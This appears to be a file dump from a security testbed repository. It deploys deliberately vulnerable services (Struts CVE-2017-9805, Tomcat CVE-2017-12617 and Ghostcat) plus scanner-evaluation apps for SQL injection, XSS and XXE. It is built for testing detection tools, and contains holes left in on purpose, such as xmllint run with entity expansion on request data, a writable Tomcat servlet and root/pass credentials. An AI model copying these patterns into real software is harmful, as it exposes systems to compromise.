deployment configs for an Apache Struts installation 4 | that's vulnerable to CVE-2017-9805 (RCE via Insecure Deserialisation). 5 | 6 | The deployed service has name `apache-struts-cve-2017-9805` and listens on port 7 | `80`. 
8 | 9 | -------------------------------------------------------------------------------- /apache/structs/CVE-2017-9805/apache-struts-cve-2017-9805.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vulnerable Apache Struts app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-struts-cve-2017-9805 6 | labels: 7 | app: apache-struts-cve-2017-9805 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | targetPort: 8080 13 | selector: 14 | app: apache-struts-cve-2017-9805 15 | type: LoadBalancer 16 | --- 17 | # The vulnerable Apache Struts app. 18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: apache-struts-cve-2017-9805 22 | labels: 23 | app: apache-struts-cve-2017-9805 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: apache-struts-cve-2017-9805 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: apache-struts-cve-2017-9805 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: apache-struts-cve-2017-9805 39 | image: gcr.io/tsunami-testbed/apache-struts-cve-2017-9805:latest 40 | ports: 41 | - containerPort: 8080 42 | -------------------------------------------------------------------------------- /apache/tomcat/CVE-2017-12617/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM openjdk:8-jre-slim 2 | 3 | ARG CONFIG 4 | ENV CONFIG=${CONFIG} 5 | 6 | # setenv 7 | ENV CATALINA_HOME=/usr/local/tomcat 8 | ENV PATH=$CATALINA_HOME/bin:$PATH 9 | ENV TOMCAT_VERSION=8.5.16 10 | 11 | RUN mkdir -p $CATALINA_HOME 12 | 13 | # download Apache Tomcat 8.5.16 14 | RUN apt-get update && apt-get install -y curl && \ 15 | curl -fSL "https://archive.apache.org/dist/tomcat/tomcat-8/v${TOMCAT_VERSION}/bin/apache-tomcat-${TOMCAT_VERSION}.tar.gz" -o /tmp/tomcat.tar.gz && \ 16 | tar -xvf /tmp/tomcat.tar.gz -C ${CATALINA_HOME} --strip-components=1 17 | 18 | # 
set perms 19 | RUN chmod +x $CATALINA_HOME/bin/*.sh 20 | 21 | # depending on CONFIG, we might have vulnerable or not vulnerable testbed 22 | COPY ./web.xml ${CATALINA_HOME}/conf/web.xml 23 | RUN if [ "$CONFIG" = "vuln" ]; then \ 24 | sed -i 's/readonly<\/param-name>true<\/param-value>/readonly<\/param-name>false<\/param-value>/' \ 25 | /usr/local/tomcat/conf/web.xml; \ 26 | fi; 27 | 28 | EXPOSE 8080 29 | 30 | CMD ["catalina.sh", "run"] 31 | -------------------------------------------------------------------------------- /apache/tomcat/CVE-2017-12617/README.md: -------------------------------------------------------------------------------- 1 | # Apache Tomcat RCE Via JSP Upload (CVE-2017-12617) 2 | 3 | This directory contains the Dockerfile that can be used to build an 4 | Apache Tomcat instance vulnerable to CVE-2017-12617. 5 | 6 | Specifically, the dockerfile takes an optional build argument named 7 | `CONFIG`. If this argument is set to the value `vuln`, the build will 8 | produce a vulnerable service. In all other cases, the build will 9 | produce a non vulnerable service. 10 | 11 | In the vulnerable configuration, the `readonly` property in `web.xml` 12 | is set to `false`. To build a vulnerable version of the service 13 | proceed as follows. 14 | 15 | ```sh 16 | docker build --build-arg CONFIG=vuln -t tomcat . 17 | ``` 18 | 19 | In the non vulnerable configuration, the `readonly` property in 20 | `web.xml` is set to `true`. To build a non vulnerable version of the 21 | service proceed as follows. 22 | 23 | ```sh 24 | docker build -t tomcat . 25 | ``` 26 | 27 | Regardless of how the image has been built, to start the container 28 | proceed as follows. 29 | 30 | ```sh 31 | docker run --name tomcat --rm -d -p127.0.0.1:8080:8080 tomcat 32 | ``` 33 | 34 | The container is named `tomcat` and will listen to the endpoint 35 | `127.0.0.1:8080`. 
Once the testing has been done, stop the container 36 | with 37 | 38 | ```sh 39 | docker stop tomcat 40 | ``` 41 | 42 | **Apache Version**|**Affected Release Versions** 43 | :-----:|:-----:| 44 | Apache Tomcat 9|9.0.0 M1 to 9.0.0 45 | Apache Tomcat 8|8.0.0 RC1 to 8.0.46 and 8.5.0 to 8.5.22 46 | Apache Tomcat 7|7.0.0 to 7.0.81 47 | 48 | ## References 49 | * https://nvd.nist.gov/vuln/detail/cve-2017-12617 50 | * https://www.exploit-db.com/exploits/42966 51 | -------------------------------------------------------------------------------- /apache/tomcat/CVE-2020-1938/README.md: -------------------------------------------------------------------------------- 1 | # Ghostcat (CVE-2020-1938) 2 | 3 | This directory contains the deployment config for a default Tomcat application. 4 | Based on the provided version, the application might have an exposed AJP 5 | connector and therefore be vulnerable to Ghostcat. 6 | 7 | The deployed service has name `tomcat` and listens on port `8009` (AJP Connector 8 | port). 9 | 10 | **Note:** Change Tomcat version in [Template data](#template-data) according to 11 | which version you want to test. Below are the versions that are vulnerable to 12 | Ghostcat: 13 | 14 | **Apache Version**|**Affected Release Versions**|**Fixed Version** 15 | :-----:|:-----:|:-----: 16 | Apache Tomcat 9|9.0.30 and below|9.0.31 17 | Apache Tomcat 8|8.5.50 and below|8.5.51 18 | Apache Tomcat 7|7.0.99 and below|7.0.100 19 | 20 | ## Template data 21 | 22 | ```json 23 | { 24 | "tomcat_version": "8.5.32" 25 | } 26 | ``` -------------------------------------------------------------------------------- /apache/tomcat/CVE-2020-1938/tomcat_ghostcat.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the AJP connector from Tomcat. 
2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: tomcat-ghostcat 6 | labels: 7 | app: tomcat-ghostcat 8 | spec: 9 | ports: 10 | - port: 8009 11 | name: ajp 12 | targetPort: 8009 13 | selector: 14 | app: tomcat-ghostcat 15 | type: LoadBalancer 16 | --- 17 | # The deployment of Tomcat. 18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: tomcat-ghostcat 22 | labels: 23 | app: tomcat-ghostcat 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: tomcat-ghostcat 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: tomcat-ghostcat 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: tomcat-ghostcat 39 | image: tomcat:${tomcat_version} 40 | ports: 41 | - containerPort: 8009 42 | -------------------------------------------------------------------------------- /apache/tomcat/weak_credentials/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | tomcat: 5 | image: docker.io/bitnami/tomcat:10.1 6 | ports: 7 | - '8080:8080' 8 | volumes: 9 | - 'tomcat_data:/bitnami/tomcat' 10 | environment: 11 | - TOMCAT_USERNAME=root 12 | - TOMCAT_PASSWORD=pass 13 | 14 | volumes: 15 | tomcat_data: 16 | driver: local -------------------------------------------------------------------------------- /apache/tomcat/weak_credentials/tomcat.md: -------------------------------------------------------------------------------- 1 | # Tomcat 2 | # Setup 3 | 4 | 1. View the docker-compose.yml file to view the selected username and password 5 | 6 | 2. Run the compose file in this directory: `docker-compose up` 7 | 8 | 3. Connect to it locally by going to `localhost:8080` 9 | 10 | 4. 
Verify to see if working properly: Log in by visiting `localhost:8080/manager/html` and using root credentials 11 | -------------------------------------------------------------------------------- /apache/zeppelin/exposed_ui/README.md: -------------------------------------------------------------------------------- 1 | # Apache Zeppelin Notebook 2 | 3 | This directory contains the deployment configs for a simple Apache Zeppelin 4 | Notebook application. The service listens on port `80`. 5 | 6 | This configs deploys the following services: 7 | 8 | - `apachezeppelin`: the Zeppelin Notebook application. 9 | -------------------------------------------------------------------------------- /apache/zeppelin/exposed_ui/zeppelin.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the Zeppelin Notebook app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apachezeppelin 6 | labels: 7 | app: zeppelin 8 | version: ${zeppelin_version} 9 | spec: 10 | ports: 11 | - port: 80 12 | name: http 13 | targetPort: 8080 14 | selector: 15 | app: zeppelin 16 | version: ${zeppelin_version} 17 | type: LoadBalancer 18 | --- 19 | # The Zeppelin Notebook app. 
20 | apiVersion: apps/v1 21 | kind: Deployment 22 | metadata: 23 | name: zeppelin 24 | labels: 25 | app: zeppelin 26 | version: ${zeppelin_version} 27 | spec: 28 | selector: 29 | matchLabels: 30 | app: zeppelin 31 | version: ${zeppelin_version} 32 | tier: frontend 33 | strategy: 34 | type: Recreate 35 | template: 36 | metadata: 37 | labels: 38 | app: zeppelin 39 | tier: frontend 40 | version: ${zeppelin_version} 41 | spec: 42 | containers: 43 | - name: zeppelin 44 | image: apache/zeppelin:${zeppelin_version} 45 | ports: 46 | - containerPort: 8080 47 | -------------------------------------------------------------------------------- /archery_range/README.md: -------------------------------------------------------------------------------- 1 | # Archery Range 2 | 3 | The Archery Range is an assortion of (stateful) testbed applications aimed at 4 | web application security scanners. The goal is to have a testbed to evaluate the 5 | pure detection capabilities of scanners. Orthogonal aspects such as crawling or 6 | in-page coverage of, e.g., single page applications, need to be taken into 7 | considerations for a high-quality scanner, however, are purposefully not part of 8 | the goal of this testbed. For more information about a testbed aimed at crawling 9 | capabilities feel free to take a look at the [Crawl Maze](https://github.com/google/security-crawl-maze). 10 | 11 | ## Testbed applications 12 | 13 | The testbed applications can be found in their respective subfolders, e.g., 14 | `sqli/`, and contain instruction for running them locally. Testbed applications 15 | usually serve the index page under a prefix specific to the application, e.g., 16 | `http://127.0.0.1/sqli/` for the SQLI testbed application. As the testbed 17 | applications are vulnerable to high-impact issues, e.g., XXE, we advise to run 18 | them in a container/VM. 
19 | -------------------------------------------------------------------------------- /archery_range/sqli/README.md: -------------------------------------------------------------------------------- 1 | # Archery Range: SQLI Testbed 2 | 3 | The application hosts SQLI tests for web-security vulnerability scanners. 4 | 5 | It relies on a mysql and postgres db system running accessible to the 6 | application that was initialized using the respective scripts under `database/`. 7 | Connectivity to the DB's is done using environment parameters as per the 8 | following command. 9 | 10 | Install the requirements: 11 | ```sh 12 | pip3 install -r requirements.txt 13 | ``` 14 | 15 | Run the SQLI testbed: 16 | ```sh 17 | MYSQL_DB=archery_range MYSQL_USER=archery_range MYSQL_PASSWORD= MYSQL_HOST=127.0.0.1 POSTGRES_DB=archery_range POSTGRES_USER=archery_range POSTGRES_PASSWORD= POSTGRES_HOST=127.0.0.1 python3 app.py 18 | ``` 19 | -------------------------------------------------------------------------------- /archery_range/sqli/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/security-testbeds/1bbb218d8941f47f817d4d8bffc56ea37c7ef1c6/archery_range/sqli/__init__.py -------------------------------------------------------------------------------- /archery_range/sqli/app.py: -------------------------------------------------------------------------------- 1 | # Copyright 2021 Google LLC. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | # ============================================================================== 15 | """The entry point for Flask App serving the testbed's content.""" 16 | import os 17 | from absl import app 18 | from flask import Flask 19 | from flask import render_template 20 | from blueprints.googlesql.googlesql import googlesql_blueprint 21 | from blueprints.mysql.mysql import mysql_blueprint 22 | from blueprints.postgresql.postgresql import postgresql_blueprint 23 | from custom_message_error import CustomMessageError 24 | from googlesql_database.db_init import * 25 | 26 | flask_app = Flask(__name__) 27 | flask_app.register_blueprint(postgresql_blueprint, url_prefix="/sqli/postgresql") 28 | flask_app.register_blueprint(mysql_blueprint, url_prefix="/sqli/mysql") 29 | flask_app.register_blueprint(googlesql_blueprint, url_prefix="/sqli/googlesql") 30 | 31 | @flask_app.route("/") 32 | @flask_app.route("/sqli/") 33 | def index(): 34 | return render_template("index.html") 35 | 36 | 37 | @flask_app.errorhandler(CustomMessageError) 38 | def custom_message_error_handler(e): 39 | return render_template( 40 | "error.html", error_code=e.status_code, 41 | error_message=e.message), e.status_code 42 | 43 | 44 | def main(unused_argv): 45 | initialize_googlesql_db() 46 | flask_app.run(host="0.0.0.0", port=int(os.environ.get("PORT", 8080))) 47 | 48 | if __name__ == '__main__': 49 | app.run(main) 50 | -------------------------------------------------------------------------------- /archery_range/sqli/custom_message_error.py: -------------------------------------------------------------------------------- 1 | # Copyright 2021 Google LLC. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 
5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | # ============================================================================== 15 | """Error for presenting error page with custom status code and custom error message.""" 16 | 17 | 18 | class CustomMessageError(Exception): 19 | 20 | def __init__(self, status_code, message): 21 | super().__init__() 22 | self.status_code = status_code 23 | self.message = message 24 | -------------------------------------------------------------------------------- /archery_range/sqli/googlesql_database/csv_files/cartitems.csv: -------------------------------------------------------------------------------- 1 | 1,20,9,6 2 | 2,3,4,6 3 | 3,2,5,6 4 | 4,13,1,6 5 | 5,11,5,2 6 | 6,14,9,2 7 | 7,2,5,10 8 | 8,6,6,9 9 | 9,8,1,9 10 | 10,19,12,9 11 | 11,13,11,9 12 | 12,12,44,9 13 | 13,18,75,9 14 | 14,1,6,5 15 | 15,2,12,5 16 | 16,3,15,9 17 | 17,5,100,9 18 | 18,7,16,9 19 | 19,9,22,9 20 | 20,20,4,9 21 | -------------------------------------------------------------------------------- /archery_range/sqli/googlesql_database/csv_files/carts.csv: -------------------------------------------------------------------------------- 1 | 1,voreilly 2 | 2,jazmyne81 3 | 3,jazmyne81 4 | 4,casper.bessie 5 | 5,jaylan.zulauf 6 | 6,voreilly 7 | 7,voreilly 8 | 8,ddietrich 9 | 9,jazmyne81 10 | 10,jazmyne81 11 | -------------------------------------------------------------------------------- /archery_range/sqli/googlesql_database/csv_files/items.csv: -------------------------------------------------------------------------------- 1 | 1,king penguin plush,"Long beak, with 
yellow, black, and white fur.",160.31,toy,True 2 | 2,honey badger plush,The most aggressive badger you will ever meet.,9999.99,toy,True 3 | 3,monkey plush,This guy will swing from vine to vine.,2.50,toy,True 4 | 4,sunflower seeds,Small seeds that are delicious and can even grow a sunflower.,0.00,food,True 5 | 5,apple,Bright red spheres with a waxy coating.,107.01,food,True 6 | 6,salmon,Use it as a pet or as dinner.,9999.99,food,False 7 | 7,curry paste,Add some authentic flavor to any dish.,9999.99,food,True 8 | 8,coconut,"It has a tough exterior, but a delicious interior.",11.16,food,True 9 | 9,ginger,"I do not like this, so you can have it.",0.00,food,True 10 | 10,cinnamon,Who knew we could turn this tree bark into something flavorful?,57.50,food,True 11 | 11,totem pole,This pole is 40 feet tall.,737.67,furniture,False 12 | 12,drawer,"Store your stuff, it even has a lock on it!",584.29,furniture,True 13 | 13,phone,Just a good old school phone.,25.92,electronic,False 14 | 14,computer,It runs LINUX!,337.50,electronic,True 15 | 15,flash drive,"Small and spacious, it holds 20 GB",9999.99,electronic,True 16 | 16,headphones,Active co-worker cancelling.,9999.99,electronic,False 17 | 17,server,Run your own website and brag about it to your friends.,1658.52,electronic,True 18 | 18,lotion,Keep your skin moisturized.,9999.99,hygiene,True 19 | 19,body wash,Keep your skin clean.,9999.99,hygiene,True 20 | 20,perfume,Did you know perfume is unisex? 
Perfume just has a higher concentration of essential oils.,0.00,hygiene,True 21 | -------------------------------------------------------------------------------- /archery_range/sqli/googlesql_database/csv_files/users.csv: -------------------------------------------------------------------------------- 1 | casper.bessie,green,immanuel.walker@example.net 2 | jazmyne81,yellow,znicolas@example.net 3 | jaylan.zulauf,purple,ptowne@example.net 4 | ddietrich,orange,alarkin@example.org 5 | voreilly,green,lind.maye@example.org 6 | -------------------------------------------------------------------------------- /archery_range/sqli/googlesql_database/db_init.py: -------------------------------------------------------------------------------- 1 | import os 2 | from google.cloud import spanner 3 | import csv,ast 4 | # resources dependency 5 | OPERATION_TIMEOUT_SECONDS = 200 6 | 7 | instance_id = os.environ.get( 8 | "SPANNER_INSTANCE_ID", "tfgen-spanid-20230712060131434" 9 | ) 10 | database_id = "archery_range" 11 | 12 | def get_data_from_csv(filename): 13 | filepath = str("./googlesql_database/csv_files/"+filename) 14 | data = [] 15 | with open(filepath,'r') as csvfile: 16 | for row in csv.reader(csvfile,quotechar='"'): 17 | actual_row = [] 18 | for entry in row: 19 | try: 20 | actual_row.append(ast.literal_eval(str(entry))) 21 | except: 22 | actual_row.append(str(entry)) 23 | data.append(tuple(actual_row)) 24 | return data 25 | 26 | def build_db(database): 27 | operation = database.update_ddl( 28 | ddl_statements=[ 29 | """ CREATE TABLE IF NOT EXISTS `users` (`username` STRING(1024) NOT NULL,`color` STRING(1024) NOT NULL,`email` STRING(1024) NOT NULL ) PRIMARY KEY (`username`) """, 30 | """ CREATE TABLE IF NOT EXISTS `items` (`id` INT64 NOT NULL, `name` STRING(1024) NOT NULL, `description` STRING(1024) NOT NULL, `price` FLOAT64 NOT NULL, `category` STRING(1024), `is_available` BOOL NOT NULL ) PRIMARY KEY(`id`) """, 31 | """ CREATE TABLE IF NOT EXISTS `carts` (`id` INT64 NOT 
NULL, `username` STRING(1024) NOT NULL) PRIMARY KEY (`id`) """, 32 | """ CREATE TABLE IF NOT EXISTS `cartitems` (`id` INT64 NOT NULL, `item_id` INT64 NOT NULL, `quantity` INT64 NOT NULL, `cart_id` INT64 NOT NULL) PRIMARY KEY(`id`) """, 33 | ], 34 | ) 35 | operation.result(OPERATION_TIMEOUT_SECONDS) 36 | 37 | def insert_data(database): 38 | with database.batch() as batch: 39 | batch.insert_or_update( 40 | table = "users", 41 | columns = ("username","color","email"), 42 | values = get_data_from_csv("users.csv"), 43 | ) 44 | 45 | batch.insert_or_update( 46 | table = "items", 47 | columns = ("id","name","description","price","category","is_available"), 48 | values = get_data_from_csv("items.csv") 49 | ) 50 | 51 | batch.insert_or_update( 52 | table = "carts", 53 | columns = ("id","username"), 54 | values = get_data_from_csv("carts.csv") 55 | ) 56 | 57 | batch.insert_or_update( 58 | table = "cartitems", 59 | columns = ("id","item_id","quantity","cart_id"), 60 | values = get_data_from_csv("cartitems.csv") 61 | ) 62 | 63 | def initialize_googlesql_db(): 64 | try: 65 | spanner_client = spanner.Client() 66 | instance = spanner_client.instance(instance_id) 67 | database = instance.database(database_id) 68 | build_db(database) 69 | insert_data(database) 70 | print("db_init script passed") 71 | except Exception as e: 72 | print("db_init script failed"+ "\n" + "Error: " + str(e)) 73 | -------------------------------------------------------------------------------- /archery_range/sqli/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.2.2 2 | PyMySQL==1.0.2 3 | psycopg2-binary==2.9.3 4 | -------------------------------------------------------------------------------- /archery_range/sqli/templates/error.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | 19 | {{error_code}} Error 20 | 21 | 22 |

23 | {{error_code}} Error 24 |

25 |

26 | {{error_message}} 27 |

28 | 29 | 30 | -------------------------------------------------------------------------------- /archery_range/sqli/templates/index.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | 19 | Archery Range: SQL Injection 20 | 21 | 22 | 23 |

Archery Range: SQL Injection

24 | 25 |

Database Systems

26 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /archery_range/sqli/templates/index_database.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | 19 | Archery Range SQLI ({{ database }}) 20 | 21 | 22 | 23 |

Archery Range SQLI ({{ database }})

24 | 25 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /archery_range/sqli/templates/items.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | 19 | Archery Range SQLI 20 | 21 | 22 | 23 |

Archery Range SQLI: Items

24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | {% for item in db_items %} 34 | 35 | 36 | 37 | 38 | 39 | 41 | {% endfor %} 42 |
IdNamePriceCategoryDescription
{{ item.id }}{{ item.name }}{{ item.price }}{{ item.category }}{{ item.description }}
43 | 44 | 45 | -------------------------------------------------------------------------------- /archery_range/sqli/test_case_decorator.py: -------------------------------------------------------------------------------- 1 | # Copyright 2021 Google LLC. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | # ============================================================================== 15 | import collections 16 | 17 | TestCase = collections.namedtuple('TestCase', ['url', 'description']) 18 | 19 | 20 | class TestCaseDecorator: 21 | """An object containing all test cases that make up the test suite for a specific database system. 22 | 23 | Exposes its functionality via the decorator pattern. 24 | 25 | Attributes: 26 | url_prefix: The path prefix which hosts all test cases for the given 27 | database system. 28 | test_cases: The collected test cases containing the url and pointers to 29 | where injected values are being used in the query. 30 | """ 31 | 32 | def __init__(self, url_prefix: str): 33 | if not url_prefix.startswith('/'): 34 | raise ValueError('The url_prefix must start with a /.') 35 | 36 | self.url_prefix = url_prefix.rstrip('/') 37 | self.test_cases = list() 38 | 39 | def add_test_case(self, relative_url: str, description: str): 40 | """Adds a testcase to the internal state. 41 | 42 | Expands the relative URL with the prefix, matching the routes configured via 43 | the Flask blueprints. 
Stores the expanded URL together with the description 44 | and returns the identity function as decorator. 45 | 46 | Args: 47 | relative_url: the route to the testcase in the blueprint, including query 48 | parameters with default values 49 | description: A description where the provided values will be used in the 50 | query. 51 | 52 | Returns: 53 | The identity function 54 | """ 55 | if not relative_url.startswith('/'): 56 | raise ValueError( 57 | 'The relative_url provided to the decorator must start with a /.') 58 | self.test_cases.append( 59 | TestCase(self.url_prefix + relative_url, description)) 60 | 61 | def inner(func): 62 | return func 63 | 64 | return inner 65 | 66 | def get_test_cases(self): 67 | return self.test_cases 68 | -------------------------------------------------------------------------------- /archery_range/xss/README.md: -------------------------------------------------------------------------------- 1 | # Archery Range: XSS Testbed 2 | 3 | The application hosts XSS tests for web-security vulnerability scanners. 4 | 5 | The core idea is to not statically provide tests but generate them through 6 | templating and string manipulation by picking the tests' components - 7 | namely source, sink, context and processing. 8 | 9 | There is a division between server-side and client-side tests. 10 | Some components such as DOM sources are only available on client-side 11 | and can thus not be processed and sinked on the server-side. 12 | 13 | The testbed is combinatorial in nature, thus, testing only specific cases is 14 | more reasonable than exhaustively testing all the XSS testcases. 
15 | 16 | Install the requirements: 17 | ```sh 18 | pip3 install -r requirements.txt 19 | ``` 20 | 21 | Run the XSS testbed: 22 | ```sh 23 | python3 app.py 24 | ``` 25 | -------------------------------------------------------------------------------- /archery_range/xss/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/security-testbeds/1bbb218d8941f47f817d4d8bffc56ea37c7ef1c6/archery_range/xss/__init__.py -------------------------------------------------------------------------------- /archery_range/xss/components/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/security-testbeds/1bbb218d8941f47f817d4d8bffc56ea37c7ef1c6/archery_range/xss/components/__init__.py -------------------------------------------------------------------------------- /archery_range/xss/components/constants.py: -------------------------------------------------------------------------------- 1 | # Copyright 2021 Google LLC. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 
14 | # ============================================================================== 15 | import os 16 | import string 17 | 18 | APP_PORT = int(os.getenv("PORT", 8080)) 19 | 20 | # Cookie and client storage key used when retrieving and setting stored sources 21 | COOKIE_KEY = os.getenv('AR_COOKIE', 'archery_range') 22 | CLIENT_STORAGE_KEY = os.getenv('AR_STORAGE_KEY', 'archery_range') 23 | 24 | # POST/GET parameters used in the reflection source 25 | POST_PARAM_NAME = os.getenv("AR_POST_PARAM", "q") 26 | GET_PARAM_NAME = os.getenv("AR_GET_PARAM", "q") 27 | 28 | # List of characters considered safe in an URL 29 | # Used to validate component names during testing 30 | URL_SAFE_CHARS = list(string.ascii_letters) + list( 31 | string.digits) + [".", "-", "_"] 32 | -------------------------------------------------------------------------------- /archery_range/xss/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.2.2 2 | -------------------------------------------------------------------------------- /archery_range/xss/templates/index.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | Archery Range XSS 19 |

Archery Range XSS

20 | 21 |

Client XSS Sources

22 |
    23 | {% for name in client_sources %} 24 |
  • {{name}}
  • 25 | {% endfor %} 26 | 27 |
28 | 29 |

Server XSS Sources

30 |
    31 | {% for name in server_sources %} 32 |
  • {{name}}
  • 33 | {% endfor %} 34 |
35 | -------------------------------------------------------------------------------- /archery_range/xss/templates/source.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | Archery Range XSS 19 |

Archery Range XSS

20 | 21 |

{{list_name}}

22 |
    23 | {% for name, url in links.items() %} 24 |
  • {{name}}
  • 25 | {% endfor %} 26 |
27 | -------------------------------------------------------------------------------- /archery_range/xxe/README.md: -------------------------------------------------------------------------------- 1 | # Archery Range: XXE Testbed 2 | 3 | The application hosts XXE tests for web-security vulnerability scanners. 4 | 5 | Most XML parsing libraries do correctly handle XML input and disable features 6 | such as entity expansion by default. Some even no longer allow to set insecure 7 | parsing modes at all. Thus, this testbed application is a simple wrapper around 8 | `xmllint` which can be configured insecurely by passing the `--noent` command 9 | line flag. 10 | 11 | The testbed requires the system to have the `xmllint` utility installed. 12 | 13 | Install the requirements: 14 | ```sh 15 | pip3 install -r requirements.txt 16 | sudo apt update && apt install libxml2-utils 17 | ``` 18 | 19 | Run the XXE testbed: 20 | ```sh 21 | python3 app.py 22 | ``` 23 | -------------------------------------------------------------------------------- /archery_range/xxe/app.py: -------------------------------------------------------------------------------- 1 | # Copyright 2021 Google LLC. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 
14 | # ============================================================================== 15 | """The entry point for the Flask app that is serving the XXE testbed.""" 16 | import os 17 | import subprocess 18 | 19 | from flask import Blueprint 20 | from flask import Flask 21 | from flask import make_response 22 | from flask import render_template 23 | from flask import request 24 | 25 | app = Flask(__name__) 26 | 27 | blueprint = Blueprint("xxe", __name__, template_folder="templates") 28 | 29 | 30 | @app.route("/") 31 | def health(): 32 | return make_response("XXE testbed is healthy!") 33 | 34 | 35 | @blueprint.route("/") 36 | def index(): 37 | return render_template("index.html") 38 | 39 | 40 | @blueprint.route("/reflect_xml_post_page", methods=["GET"]) 41 | def xxe_reflect_xml_post_page(): 42 | return render_template("reflect_xml_post.html") 43 | 44 | 45 | @blueprint.route("/reflect_xml_post_endpoint", methods=["POST"]) 46 | def xxe_reflect_xml_post_endpoint(): 47 | if not request.data: 48 | return make_response("Missing data in the request body!", 400) 49 | try: 50 | processed_xml = process_xml(request.data) 51 | except ValueError: 52 | return make_response("Could not parse the provided XML!", 400) 53 | 54 | response = make_response(processed_xml, 200) 55 | response.headers["Content-Type"] = "text/xml" 56 | return response 57 | 58 | 59 | def process_xml(xml_string): 60 | process = subprocess.Popen(["xmllint", "--noent", "-"], 61 | stdin=subprocess.PIPE, 62 | stdout=subprocess.PIPE, 63 | stderr=subprocess.PIPE) 64 | [stdout, stderr] = process.communicate(xml_string) 65 | if stderr: 66 | raise ValueError("XML could not be parsed") 67 | return stdout 68 | 69 | 70 | if __name__ == "__main__": 71 | app.register_blueprint(blueprint, url_prefix="/xxe") 72 | 73 | app.run(host="0.0.0.0", port=int(os.environ.get("PORT", 8080))) 74 | -------------------------------------------------------------------------------- /archery_range/xxe/requirements.txt: 
-------------------------------------------------------------------------------- 1 | Flask==2.2.2 2 | -------------------------------------------------------------------------------- /archery_range/xxe/templates/index.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | XXE Testbed 19 |

XXE Testbed

20 | 25 | -------------------------------------------------------------------------------- /archery_range/xxe/templates/reflect_xml_post.html: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | XXE Testbed - Reflected POST with XML content 19 |

Reflected POST with XML content

20 |

21 | JavaScript on this page performs a request to a vulnerable XML processing endpoint with XML mime type. 22 |

